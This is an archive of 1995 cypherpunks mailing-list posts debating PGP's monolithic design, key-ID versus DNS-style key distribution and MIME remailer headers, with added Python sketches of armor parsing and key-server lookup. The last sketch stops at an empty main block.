>     Analyst, a Virginia publisher, who is seeking access to the
>     Department of Justice JURIS database of court decisions in
>     order to put the information into the public domain.  Tax
>     Analysts alleges the JURIS database of court decisions are
>     subject to FOIA and not protected by copyright.  A victory
>     by Tax Analysts in this case will lead to a public domain
>     database of federal court decisions.

The Tax Analyst lawsuit: destined to fail from the start.
If they want to do this they will have to come up with their own
indexing/citation system, and then get everyone to adapt to it.
About as likely as putting 73v AC wiring in every home in America.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 10 Feb 95 11:48:38 PST
To: Eric Hollander <hh@xcf.berkeley.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502101849.AA21833@xcf.Berkeley.EDU>
Message-ID: <199502101951.OAA28877@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>if i use a command like
>
>	pgp filename
>
>it will automatically figure out the right thing to do with the file.  if
>it's encrypted, and i have the key, it will attempt to decrypt it.  if it
>contains keys, it will ask if i want to add them to my keyring.  if it's
>signed, it checks the signature.
>
>this sucks!
>
>if i'm trying to write a program to automatically process incoming mail (for
>instance, to see if it's encrypted with a specific key), i certainly don't
>want to have the possibility of people being able to add garbage to my
>keyring just by mailing it to me.
>
...

PGP suffers from its failure to separate cleanly its primary
mechanism (encrypting and signing messages) from policy (what to
do with those signed and encrypted mechanisms).  Without a clean
separation, the mechanism is limited to use in those applications
narrowly envisioned by the system's authors.  Of course, PGP is
hardly unique here; designing clean interfaces and separation-of-
functions isn't easy, and it's even harder in the face of meeting
the needs of an existing installed base of first-generation users.

Personally, I'd much rather see a suite of tools: an encryption/signature
tool (or maybe tools - let me apply them in whatever order is
appropriate), a decryption verification tool, a certificate management
system that operates on messages signed with the signature tool and a
top level that glues all this together and implements local policy
(like what constitutes a valid signature, key revocation, etc).  If
we had a system that worked like this, we could more easily create
richer key certificates that specify restrictions on what is being
signed, revocation conditions, etc.  (As it is, there isn't even
any way for a key signer to revoke a signature, let alone describe
what purpose the signature exists for.)

Of course, you could probably build all this ON TOP of the existing
pgp and pem, but you'd still be left with bloated underlying tools
that implement more policy than they need to.

Oh well.

-matt
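
One way to draw the mechanism/policy line described above, as an added
sketch (not PGP's code and not from the post): the scanner only reports
which armor blocks a mail contains, and a separate table decides what an
unattended mail processor may do with each, so a mailed key block is never
imported as a side effect.  The kind names, actions and sample mails are
constructed for illustration.

```python
"""Mechanism vs. policy for unattended handling of PGP mail (added example)."""
import re
from collections import namedtuple

Block = namedtuple("Block", "kind first_line last_line")

# Armor only counts at the start of a line; dash-escaped ("- -----BEGIN ...")
# or quoted ("> -----BEGIN ...") copies inside other text do not match.
BEGIN = re.compile(r"-----BEGIN PGP ([A-Z0-9 ,/]+)-----$")
KINDS = {
    "MESSAGE": "message",
    "SIGNED MESSAGE": "clearsigned",
    "PUBLIC KEY BLOCK": "public_key",
    "SIGNATURE": "detached_signature",
}


def scan(text):
    """Mechanism: report the armor blocks present.  No keyring, no side effects."""
    lines = [line.rstrip() for line in text.splitlines()]
    blocks, i = [], 0
    while i < len(lines):
        m = BEGIN.match(lines[i])
        if not m:
            i += 1
            continue
        label = m.group(1)
        # Clearsigned text and its signature form one unit closed by END SIGNATURE.
        closer = "SIGNATURE" if label == "SIGNED MESSAGE" else label
        try:
            j = lines.index(f"-----END PGP {closer}-----", i + 1)
        except ValueError:
            blocks.append(Block("malformed", i, len(lines) - 1))
            break
        blocks.append(Block(KINDS.get(label, "unknown"), i, j))
        i = j + 1
    return blocks


# Policy: what each caller allows.  Anything not listed is rejected.
UNATTENDED = {"message": "decrypt", "clearsigned": "verify",
              "public_key": "quarantine"}
INTERACTIVE = dict(UNATTENDED, public_key="ask_user",
                   detached_signature="verify")


def decide(text, policy):
    """Pair every block the mechanism found with the action the policy permits."""
    return [(b.kind, policy.get(b.kind, "reject")) for b in scan(text)]


# Constructed sample mails; the armor bodies are placeholders, not PGP data.
MAIL_WITH_KEY = """\
Subject: hello

-----BEGIN PGP MESSAGE-----
Version: 2.6

(constructed ciphertext)
-----END PGP MESSAGE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

(constructed key material)
-----END PGP PUBLIC KEY BLOCK-----
"""

CLEARSIGNED_WITH_EMBEDDED_KEY = """\
-----BEGIN PGP SIGNED MESSAGE-----

please add this key
- -----BEGIN PGP PUBLIC KEY BLOCK-----
(constructed)
- -----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: 2.6

(constructed signature)
-----END PGP SIGNATURE-----
"""

TRUNCATED = "-----BEGIN PGP MESSAGE-----\n\n(constructed, cut off)\n"

if __name__ == "__main__":
    for name, mail in [("with key", MAIL_WITH_KEY),
                       ("clearsigned", CLEARSIGNED_WITH_EMBEDDED_KEY),
                       ("truncated", TRUNCATED)]:
        print(name, decide(mail, UNATTENDED))
```

The same scan() output drives both tables, so changing what a site allows
never means touching the parsing code.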




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 11:58:46 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <199502101951.OAA28877@crypto.com>
Message-ID: <9502101958.AA15039@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze says:
> PGP suffers from its failure to separate cleanly its primary
> mechanism (encrypting and signing messages) from policy (what to
> do with those signed and encrypted mechanisms).  Without a clean
> separation, the mechanism is limited to use in those applications
> narrowly envisioned by the system's authors.
[...]
> Personally, I'd much rather see a suite of tools: an encryption/signature
> tool (or maybe tools - let me apply them in whatever order is
> appropriate), a decryption verification tool, a certificate management
> system that operates on messages signed with the signature tool and a
> top level that glues all this together and implements local policy
> (like what constitutes a valid signature, key revocation, etc).  If
> we had a system that worked like this, we could more easily create
> richer key certificates that specify restrictions on what is being
> signed, revocation conditions, etc.

I've been saying this for a long time, and I want to triple-reiterate
it -- PGP needs to be broken down into simple Unix-philosophy style
tools, or it isn't going to be useful in the long run.

I'll also note, yet again, that unless PGP quits this bad practice of
identifying counterparties only by a number, it is NOT going to be
universally deployed. Counterparties need to be identified by a name
that can be looked up in the DNS -- meaning "joe@foo.com" rather than
some key ident number.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erich von Hollander <erich@CSUA.Berkeley.EDU>
Date: Fri, 10 Feb 95 15:03:31 PST
To: Derek Atkins <warlord@mit.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502102058.AA07955@josquin.media.mit.edu>
Message-ID: <199502102303.PAA24281@soda.CSUA.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In message <9502102058.AA07955@josquin.media.mit.edu>, Derek Atkins writes:
>
>> if i use a command like
>> 
>> 	pgp filename
>
>The problem is that you are using the wrong command....

hal pointed out to me that

	pgp -F

will do exactly what i want.  it will work.  the behavior of pgp -F (given
keys, for instance) is not well-described in the docs, but it will do what i
want it to.

as hal said, i can catch the stdout for the data, and catch the stderr for
out-of-band info about the data, and this will work fine.

and the product of all this is going to be quite cool.  i'll post it when
it's finished.

e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 12:20:29 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <199502082037.MAA02640@jobe.shell.portal.com>
Message-ID: <9502102017.AA11002@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 8 Feb 1995 12:37:54 -0800
    From: Hal <hfinney@shell.portal.com>
    
    Nathaniel Borenstein <nsb@nsb.fv.com> writes:

    Right now we are basically having the remailing commands be mail
    header fields.  But really people aren't supposed to just make up
    new fields like that.  I think the "name space" of these fields is
    protected somewhat more than many other aspects of communication
    protocols on the net.

If you start your header name with X-, then you are conforming to that
gross, ugly atrocity that is MIME.  And yet, by using headers rather
than TGUATIM, you help to preserve sanity and avoid that vast majority
of MIME slime.

Note that I'm not suggesting that MIME has no place.  When you truly
need to mix data types and you *want* the different parts to be easily
processed by all, it makes perfect sense.

Given the privacy goals of a remailing, MIME has only disadvantages.

    Is there precedent for adding service-by-mail functionality in
    this way?  I am not completely comfortable with it.  And as we
    think of new functionality and new commands they all have to get
    added at this top level, the same visibility and name space as
    "Subject", "From", and "To".

So, do what you have to in C and C++-sans-namespaces, use a prefix.
X-RM- could prefix the Remailer namespace.  It's ugly, but compared to
the alternative it is pure beauty.
    
--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 12:36:40 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: why pgp sucks
In-Reply-To: <199502102031.MAA21422@jobe.shell.portal.com>
Message-ID: <9502102036.AA15222@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal says:
> "Perry E. Metzger" <perry@imsi.com> writes:
> >I'll also note, yet again, that unless PGP quits this bad practice of
> >identifying counterparties only by a number, it is NOT going to be
> >universally deployed. Counterparties need to be identified by a name
> >that can be looked up in the DNS -- meaning "joe@foo.com" rather than
> >some key ident number.
> 
> PGP of course looks up keys by strings in addition to numbers.  A widely
> accepted practice is to use <joe@foo.com> in the user ID which allows the
> lookups to be by internet address.

The problem is that incoming messages are tagged with the number, not
the string. You can't check the signature if you don't have the number
in your own database. Global databases don't scale. Distributed
databases like DNS do scale. DNS style naming doesn't hurt non-DNS
users, so it's a shame that it isn't there -- I, for one, can't specify
PGP style keys in the internet key management system I'm working on
because of this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 12:42:18 PST
To: "P. M. Dierking" <xpat@vm1.spcs.umn.edu>
Subject: Re: MIME based remailing commands
In-Reply-To: <9502082251.AA03118@toad.com>
Message-ID: <9502102039.AA11466@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date:         Wed, 08 Feb 95 16:37:06 CST
    From: xpat@vm1.spcs.umn.edu
    
    I say take the remail stuff out of the header altogether,
    MIME or not.

If by this, you mean to follow more of the model used by
remail@extropia.wimsey.com, then I completely agree.  What travels in
the clear should not *require* any header data.  It could even include
misleading headers.  A remailer should be able to accept mail which is
encrypted for it.  It can then decode the encrypted part and discard
the rest.  The format of the decrypted message could be whatever works
best for remailers which might or might not have anything at all to do
with MIME.

OTOH, if you are going to have information in the clear to support
naive users or whatever, put the information in the header.  The whole
purpose of headers is for auxiliary information about the message and
its delivery.  The body is for the message itself.

With MIME's approach of making every piece of information as big and
clunky as possible, I'm mildly surprised that it hasn't done away with
headers altogether :-)

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 12:46:16 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <9502082303.AA10796@snark.imsi.com>
Message-ID: <9502102043.AA11506@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 08 Feb 1995 18:03:57 -0500
    From: "Perry E. Metzger" <perry@imsi.com>

    xpat@vm1.spcs.umn.edu says:
    > IMHO, an ideal message would have the ability to handle nested objects
    > of varying types, MIME is only a start.

    What is it precisely that you might want to encapsulate that MIME
    can't encapsulate?

And in what way does MIME encapsulation aid in the privacy goals of
remailing?

It seems far more likely to require that you expose information which
you might prefer not to expose, much as the Privacy Enhanced Mail
standard does.

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Date: Fri, 10 Feb 95 12:48:05 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <9502101958.AA15039@snark.imsi.com>
Message-ID: <9502102047.AA25106@hibbs.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger originally said the following...
> 
> 
> I'll also note, yet again, that unless PGP quits this bad practice of
> identifying counterparties only by a number, it is NOT going to be
> universally deployed. Counterparties need to be identified by a name
> that can be looked up in the DNS -- meaning "joe@foo.com" rather than
> some key ident number.

Doesn't having some kind of central record of keys go against
the principle of PGP?  Unless you're just talking about having
a name attached to each key, but not exactly a DNS for key
id's...  I'll admit I'm a little confused.

-----------------------------------------------------------------------------
Greg Morgan <mac5tgm@hibbs.vcu.edu>    | "I dunno Brain, me and Pipi
Mail me for PGP Key: 0xE0D222A9        |  Longstocking?  I mean what would
Key Fingerprint : 2430 BAA4 1EE4 AA2F  |  the children look like?" - Pinki
                  3B76 3516 3DEF 5529  |
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 10 Feb 95 15:54:49 PST
To: mab@crypto.com
Subject: why pgp sucks
Message-ID: <199502102348.AA09436@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Matt Blaze, quoting Greg Morgan, wrote:

> >Doesn't having some kind of central record of keys go against
> >the principle of PGP?  

> The only "principle" of which I'm aware (and particularly interested
> in supporting) is that of having widely fielded, useful and strong
> privacy and authentication tools that work properly and transparently.

I think the centralization/decentralization confusion comes from PGP's
decentralized approach to key generation and authentication, which has
been hailed as a good thing. As long as folks can generate their own
keys, sign their friends' keys, and upload their keys to servers at 
their own discretion, I can't see what would make a centralized or
standardized distribution method harmful.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 13:00:57 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: MIME based remailing commands
In-Reply-To: <199502090425.UAA24521@largo.remailer.net>
Message-ID: <9502102057.AA11903@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 8 Feb 1995 20:25:32 -0800
    From: Eric Hughes <eric@remailer.net>
    
    You say MIME, and you've not completely specified the data format,
    but rather constrained it in a way that most everybody basically
    agrees with, including me.

Could one of the MIME supporters (I guess that would be `most
everybody') explain why anything more than a To: header and an
encrypted block is desirable for the in-the-clear message?

Specifically, why is it desirable to broadcast additional information
about a message for which privacy is a primary concern?

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 10 Feb 95 13:00:01 PST
To: Hal <rfb@lehman.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <18386.792449215.1@nsb.fv.com>
Message-ID: <0jCxBn=0Eyt5AxShYL@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 10-Feb-95 Re: MIME based remailing co.. Rick
Busdiecker@lehman.c (1667)

> If you start your header name with X-, then you are conforming to that
> gross, ugly atrocity that is MIME.  And yet, by using headers rather
> than TGUATIM, you help to preserve sanity and avoid that vast majority
> of MIME slime.

Well, I have no idea why you think that MIME is an "atrocity" or
"slime", but it is perfectly clear that you have no idea what it
actually *is*, since "X-" headers have nothing whatsoever to do with
MIME.  The "X-" headers are defined by RFC 822, which has been the
standard for Internet mail formats since 1982.

Perhaps you should learn what MIME is before you embarrass yourself
further.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 12:59:12 PST
To: Eric Hollander <hh@xcf.Berkeley.EDU>
Subject: Re: why pgp sucks
In-Reply-To: <9502101849.AA21833@xcf.Berkeley.EDU>
Message-ID: <9502102058.AA07955@josquin.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> if i use a command like
> 
> 	pgp filename

The problem is that you are using the wrong command....

> it will automatically figure out the right thing to do with the file.  if
> it's encrypted, and i have the key, it will attempt to decrypt it.  if it
> contains keys, it will ask if i want to add them to my keyring.  if it's
> signed, it checks the signature.

This is the correct behavior of "pgp filename".  If you want other
behavior, you should tell PGP how you want it to behave.

> if i'm trying to write a program to automatically process incoming mail (for
> instance, to see if it's encrypted with a specific key), i certainly don't
> want to have the possibility of people being able to add garbage to my
> keyring just by mailing it to me.

A very noble effort, combining PGP with mailers.  Btw: When you run
"pgp filename" and filename contains public keys, it will ask you
before it adds them to your keyring!

You can use "pgp -d" to force it to do a decryption (although you
cannot specify which key to use for the decryption; it will choose any
of the keys on your secret keyring).

> is there a way of using pgp in a diagnostic mode, to just inform me of what
> the file contains (is it signed and/or encrypted, from who and to whom?),
> without processing it, and without interaction, and without messing around
> with the keyring?  has anyone written some scripts to do this kind of thing?

Well, I'm not exactly sure what you want.  You can give PGP no
password and it will tell you to whom a message is encrypted.  You can
call pgp -ka and it will _only_ add keys (and complain if you are
given anything else).  There is no way to ask PGP "what kind of
message is this"; that is sort of what the ASCII ARMOR header is for.

> or should i just wait until some of the groups working on the other
> encryption software get it out?

No, you should, at this point, consider working around the problems in
the monolithic PGP, until a more modular library is available, to
which multiple end programs can be built to do multiple little tasks,
as Matt explained.

Does this help?

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 13:02:58 PST
To: Name Withheld <nobody@tower.techwood.org>
Subject: Re: Coming to a newsserver near you alt.defeat.s314
In-Reply-To: <199502090627.WAA01928@tower.techwood.org>
Message-ID: <9502102101.AA11999@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 8 Feb 1995 22:27:59 -0800
    From: Name Withheld <nobody@tower.techwood.org>

    Psychic Flash...This group will be up on auto-subscribing news servers
    VERY soon.

It was available via CMU news servers quite some time ago.  Haven't
checked recently, but I would assume that it still is.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 13:10:58 PST
To: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502102047.AA25106@hibbs.vcu.edu>
Message-ID: <9502102110.AA07984@josquin.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Doesn't having some kind of central record of keys go against
> the principle of PGP?  Unless you're just talking about having
> a name attached to each key, but not exactly a DNS for key
> id's...  I'll admit I'm a little confused.

Not at all.

The point is to have a centralized, distributed key distribution
mechanism, similar in concept to the PGP Public Keyservers, but which
scale much much better.  The concept is similar to a DNS of PGP keys
(think of the DNS model, not the DNS implementation) where you have
keys distributed based upon site.  For example, MIT could serve MIT's
keys, and CMU would serve CMU's keys.

This does not go against PGP in any way.  In fact, it augments PGP
wonderfully.  How else would we be able to have a world-wide white
pages of PGP Public Keys?

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 13:14:00 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <9502102043.AA11506@cfdevx1.lehman.com>
Message-ID: <9502102113.AA15560@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Rick Busdiecker says:
>     What is it precisely that you might want to encapsulate that MIME
>     can't encapsulate?
> 
> And in what way does MIME encapsulation aid in the privacy goals of
> remailing?

With the security multiparts MIME standard.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 13:17:31 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <9502102057.AA11903@cfdevx1.lehman.com>
Message-ID: <9502102116.AA15570@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Rick Busdiecker says:
> Could one of the MIME supporters (I guess that would be `most
> everybody') explain why anything more than a To: header and an
> encrypted block is desirable for the in-the-clear message?
> 
> Specifically, why is it desirable to broadcast additional information
> about a message for which privacy is a primary concern?

No one said that it was desirable to do so, and MIME does not force
you to do so.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 13:19:27 PST
To: Derek Atkins <warlord@mit.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502102110.AA07984@josquin.media.mit.edu>
Message-ID: <9502102118.AA15581@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins says:
> The point is to have a centralized, distributed key distribution
> mechanism, similar in concept to the PGP Public Keyservers, but which
> scale much much better.  The concept is similar to a DNS of PGP keys
> (think of the DNS model, not the DNS implementation) where you have
> keys distributed based upon site.  For example, MIT could serve MIT's
> keys, and CMU would serve CMU's keys.
> 
> This does not go against PGP in any way.  In fact, it augments PGP
> wonderfully.  How else would we be able to have a world-wide white
> pages of PGP Public Keys?

Unfortunately, the current PGP practice of using only numeric key-ids
in message packets makes it hard to do this -- sigh. I hope that
the next version of PGP changes this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 16:29:58 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <199502102233.RAA02974@crypto.com>
Message-ID: <199502110029.QAA21514@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze <mab@crypto.com> writes:
>More seriously, the problem that Perry brought up is that it's hard
>to deploy any kind of scaleable key distribution infrastructure
>that works with PGP (as it currently exists - and yes, I realize
>there are work-arounds for some specific situations).

Could you have a distributed database where you lookup by key ID and get
a key?  Or is there a constraint that the key distribution infrastructure has
to be part of the DNS?

I could see a set of key servers where one deals with all keys that start
with 0x00, the next has all keys which start with 0x01, etc.  This makes
it easy to know which server to go to in order to look up a given key ID.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lee.noon@mgmtsys.com (Lee Noon)
Date: Sat, 11 Feb 95 07:48:51 PST
To: cypherpunks@toad.com
Subject: Re: Not necessarily crypt
Message-ID: <90.84391.1@mgmtsys.com>
MIME-Version: 1.0
Content-Type: text/plain


  
in message-ID: 
<Pine.LNX.3.91.950209105922.8309A-100000@chewy.wookie.net> 
slowdog@wookie.net wrote:

SG>On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

SG>> I heard yesterday that someone in the House of Representatives proposed an
  >> amendment to the new crime bill which was soundly defeated it. Turns out t
  >> Amendment was worded exactly as the Fourth Amendment in the Bill 'o Rights
  >> Apparently many a congressman/woman has egg on their face...

SG>Yes indeed, in response to the H666 bill. The Dems placed up for vote the 
  >text of the 4th Amendment without attributing it to be such. It was 
  >defeated. Dems then immediately took to the floor of the House accusing 
  >the Repubs of trying to dismantle the Constitution.

     Almost all right.  The Dems did acknowledge it was the fourth 
amendment, they drummed on that fact during the debate.  What they 
failed to explain was that the amendment was not offered TO the bill 
but IN PLACE OF the bill.  Even the Republicans failed to properly 
explain this, instead saying it would "gut the bill."
     This bill is not new, people.  It codifies what has been the 
practice in two federal district courts for several years.  The boogie 
man raised most often is the "confidential informant."  The use of a 
bogus CI is illegal.  It is still illegal under this bill.
     The major problem with this bill is it does not add the penalty to 
law enforcement officers for "bad faith actions." This was proposed by 
the republicans last year and ignored by the democrats.  This year the 
republicans had the power to push it through and they ignored it.  
Shows how really different they are.
     The "bad faith actions" provision would have made a LEO who 
knowingly generated a search warrant, searched without one without 
probable cause, liable for criminal charges at the federal level.  In 
other words when cop A uses cop B as his evidence for a warrant, and 
cop B lies, cop B goes to jail.  If cop A knew it was a lie, cop A goes 
to jail.  If it results in a shoot out like Waco and lives are lost, he 
goes to jail on murder one charges.  This carries the death penalty for 
a federal offense.  Naturally the one outfit which opposed this the 
most was the BATF, who violates this provision as the preferred way to 
do business.
     It is now up to the senate.  Hopefully Senator Byrd can stop 
talking about his dog long enough to bring these points to the fore.

Lee

                              Lee Noon (lee.noon@mgmtsys.com)

 * 1st 2.00b #3833 * A government can't give back anything it hasn't taken first.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 13:36:08 PST
To: perry@imsi.com
Subject: Re: why pgp sucks
In-Reply-To: <9502102118.AA15581@snark.imsi.com>
Message-ID: <9502102135.AA08054@josquin.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Unfortunately, the current PGP practice of using only numeric key-ids
> in message packets makes it hard to do this -- sigh. I hope that
> the next version of PGP changes this.

I doubt PGP will change this in the near future.  That would require a
major packet format change, and would not be anywhere near backwards
compatible.  

I don't consider this to be a big problem.  If you limit key lookups in
the database to be lookup on userID only, that solves your database
problem.  As for the keyID->userID, well, this would only be required
to _verify_ a signature.  In that case, you know who sent the message
to you so you can ask them for the key.  When you want to encrypt to
someone, you already know to whom you want to encrypt, so the same
thing applies.

I don't see the problem!

-derek

PS: I should state that I know what problem you are trying to solve,
and I'm saying that there are other workarounds to get around the
problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 13:42:13 PST
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: why pgp sucks
In-Reply-To: <9502102135.AA08054@josquin.media.mit.edu>
Message-ID: <9502102141.AA15657@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins says:
> > Unfortunately, the current PGP practice of using only numeric key-ids
> > in message packets makes it hard to do this -- sigh. I hope that
> > the next version of PGP changes this.
> 
> I doubt PGP will change this in the near future.  That would require a
> major packet format change, and would not be anywhere near backwards
> compatible.  
> 
> I don't consider this to be a big problem.

I do. It means that I can't use PGP for IPSP key management -- period.

> If you limit key lookups in the database to be lookup on userID
> only, that solves your database problem.  As for the keyID->userID,
> well, this would only be required to _verify_ a signature.  In that
> case, you know who sent the message to you so you can ask them for
> the key.  When you want to encrypt to someone, you already know to
> whom you want to encrypt, so the same thing applies.
> 
> I don't see the problem!

Sorry, but I see the problem. If I want to follow an arbitrary chain
of signatures, check arbitrary signatures, etc, I'm forced to go
through kludges or worse. I don't see it as acceptable to just ask
someone for their key, either.

Perry
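
A toy model of the two lookup schemes argued over in this thread, added here as an illustration (not code from any poster or from PGP): servers partitioned by the leading byte of the key ID, as Hal suggests, and per-site servers indexed by user ID, as Derek describes, with Perry's chain-of-signatures walk run against each. Class names, addresses and key IDs are constructed.

```python
from collections import deque, namedtuple

# key_id: 64-bit integer. signers: the key IDs found in the signature
# packets attached to this key (a signature packet names its signer only
# by key ID, which is the point under dispute).
Key = namedtuple("Key", "key_id user_id signers")


class PrefixShardedServers:
    """256 servers; server i holds every key whose key ID starts with byte i."""

    def __init__(self):
        self.shards = [{} for _ in range(256)]

    @staticmethod
    def shard_for(key_id):
        return (key_id >> 56) & 0xFF

    def publish(self, key):
        self.shards[self.shard_for(key.key_id)][key.key_id] = key

    def by_key_id(self, key_id):
        return self.shards[self.shard_for(key_id)].get(key_id)


class SiteServers:
    """Each site serves its own users' keys, indexed by user ID."""

    def __init__(self):
        self.sites = {}

    def publish(self, key):
        site = key.user_id.rsplit("@", 1)[1].lower()
        self.sites.setdefault(site, {})[key.user_id.lower()] = key

    def by_user_id(self, user_id):
        site = user_id.rsplit("@", 1)[1].lower()
        return self.sites.get(site, {}).get(user_id.lower())

    def by_key_id(self, key_id):
        # A bare key ID does not say which site holds the key, so there
        # is no server to route the query to.
        return None


def chain_to_trusted(start, trusted_ids, by_key_id):
    """Breadth-first walk over signer key IDs from `start` to any trusted key.

    Returns the list of user IDs along the chain, or None. Only reachability
    is modelled; a real verifier would also check every signature.
    """
    if start.key_id in trusted_ids:
        return [start.user_id]
    queue = deque([(start, [start.user_id])])
    seen = {start.key_id}
    while queue:
        key, path = queue.popleft()
        for signer_id in key.signers:
            if signer_id in seen:
                continue
            seen.add(signer_id)
            signer = by_key_id(signer_id)
            if signer is None:          # cannot fetch the signer's key
                continue
            if signer_id in trusted_ids:
                return path + [signer.user_id]
            queue.append((signer, path + [signer.user_id]))
    return None


# Constructed sample keys: carol signed bob's key, bob signed alice's.
CAROL = Key(0x01C0FFEE00000001, "carol@site-c.example", [])
BOB = Key(0x00A1B2C3D4E5F607, "bob@site-b.example", [CAROL.key_id])
ALICE = Key(0x7F11223344556677, "alice@site-a.example", [BOB.key_id])

SHARDED = PrefixShardedServers()
SITES = SiteServers()
for k in (ALICE, BOB, CAROL):
    SHARDED.publish(k)
    SITES.publish(k)

if __name__ == "__main__":
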